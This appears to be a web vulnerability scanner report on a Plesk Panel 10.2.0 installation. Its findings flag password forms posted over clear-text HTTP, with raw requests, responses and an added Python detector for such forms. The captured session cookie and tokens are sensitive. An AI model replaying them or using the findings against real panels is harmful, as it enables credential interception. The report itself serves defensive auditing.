<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/mail-list/create/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/mail-list/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /smb/mail-list/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:49 GMT
Connection: close
Content-Length: 15608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create Mailing List - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/mail-list/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmail-list%2Fcreate%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/mail-list/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create Mailing List</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-nal-maillist" enctype="application/x-www-form-urlencoded" action="" method="post">

<div class='form-row'>
<div class='field-name'>
<label for='listName'>Mailing list address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="listName" id="listName" value="" class="input-text" /> @
<select name="domainId" id="domainId">
<option value="1" label="nosedivesailing.com" selected="selected">vulnerable.host.fqdn</option>
</select> </span>
<div class="field-errors" style="display: none;"></div>
</div>
</div>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="enabled" value="0" /><input type="checkbox" name="enabled" id="enabled" value="1" checked="checked" class="checkbox" />
<label for='enabled'>Switched on&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='administratorEmail-form-row' class='form-row' >
<div class='field-name'><label for='administratorEmail'>Mailing list administrator's e-mail&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="administratorEmail" id="administratorEmail" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='password-form-row' class='form-row' >
<div class='field-name'><label for='password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="password" id="password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="passwordConfirmation" id="passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='subscribers-form-row' class='form-row' >
<div class='field-name'><label for='subscribers'>Subscribers&nbsp;</label></div>
<div class='field-value'>

<textarea name="subscribers" id="subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="notify" value="0" /><input type="checkbox" name="notify" id="notify" value="1" checked="checked" class="checkbox" />
<label for='notify'>Notify administrator on the mailing list creation&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
</div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/mail-list/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-nal-maillist',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/my-profile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile (the form's action attribute is empty, so it posts back to the HTTP URL it was served from)

The form contains the following password fields:

general[account][password]
general[account][passwordConfirmation]
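Findings 3.7 and 3.8 are the same defect: a form with an empty action attribute, served on the plain-HTTP port 8880, so the password fields it carries post back over clear-text HTTP. The script below is an added example written for this report; it is not Plesk code and not the scanner's own check. It parses a response with the standard library, resolves every form's action against the URL the page was fetched from (an empty or relative action resolves to that URL), and flags password fields that would be submitted over http://. It also records which of those fields carry autocomplete="off", since the 3.7 form sets it and the 3.8 form does not. The sample HTML is constructed from the 3.7 form; the second form in it is a hypothetical HTTPS control case (its host, port and path are assumptions) that must not be flagged.

```python
"""Flag HTML forms that would submit a password over clear-text HTTP.

Added example for this report, not Plesk code and not the scanner's own check.
The sample HTML below is constructed from the Create Mailing List form (3.7).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> together with its action and the <input>s inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []      # each entry: {"action": str, "inputs": [attr dicts]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # XHTML self-closing <input ... /> also arrives here via handle_startendtag.
            self._current["inputs"].append(attrs)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_cleartext_password_forms(page_url, html):
    """Return one finding per form that posts a password field over http://.

    The action is resolved with urljoin, so action="" (the Plesk case) and
    relative actions both resolve against page_url; a form served over HTTP
    therefore inherits the clear-text scheme unless it names an https:// target.
    """
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target = urljoin(page_url, form["action"])
        pw_fields = [i for i in form["inputs"]
                     if (i.get("type") or "").lower() == "password"]
        if not pw_fields:
            continue
        if urlsplit(target).scheme.lower() != "http":
            continue
        findings.append({
            "action": target,
            "password_fields": [i.get("name") or "" for i in pw_fields],
            # autocomplete="off" is a separate, weaker control; report it alongside.
            "autocomplete_off": [i.get("name") or "" for i in pw_fields
                                 if (i.get("autocomplete") or "").lower() == "off"],
        })
    return findings


PAGE_URL = "http://vulnerable.plesk.control.panel.20110407.20:8880/smb/mail-list/create/"

# Constructed sample: trimmed from the 3.7 response. The second form is a
# hypothetical HTTPS control case (host, port and path assumed) and must not be flagged.
SAMPLE_HTML = """
<form id="form-nal-maillist" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="text" name="listName" id="listName" value="" class="input-text" />
<input type="password" name="password" id="password" value="" autocomplete="off" class="input-text" />
<input type="password" name="passwordConfirmation" id="passwordConfirmation" value="" autocomplete="off" class="input-text" />
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<form id="form-control" action="https://example.invalid:8443/login" method="post">
<input type="password" name="passwd" />
</form>
"""


if __name__ == "__main__":
    for f in find_cleartext_password_forms(PAGE_URL, SAMPLE_HTML):
        print("clear-text password submission to", f["action"])
        print("  password fields:", ", ".join(f["password_fields"]))
        print("  autocomplete=off on:", ", ".join(f["autocomplete_off"]) or "none")
```

Run it against a response saved from the panel's HTTP port and the page URL it came from; a form is only cleared when its resolved action is https://, not when the field merely has autocomplete="off".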

Request

GET /smb/my-profile HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:32 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:32 GMT
Connection: close
Content-Length: 41318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>My Profile - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/my-profile/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fmy-profile' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
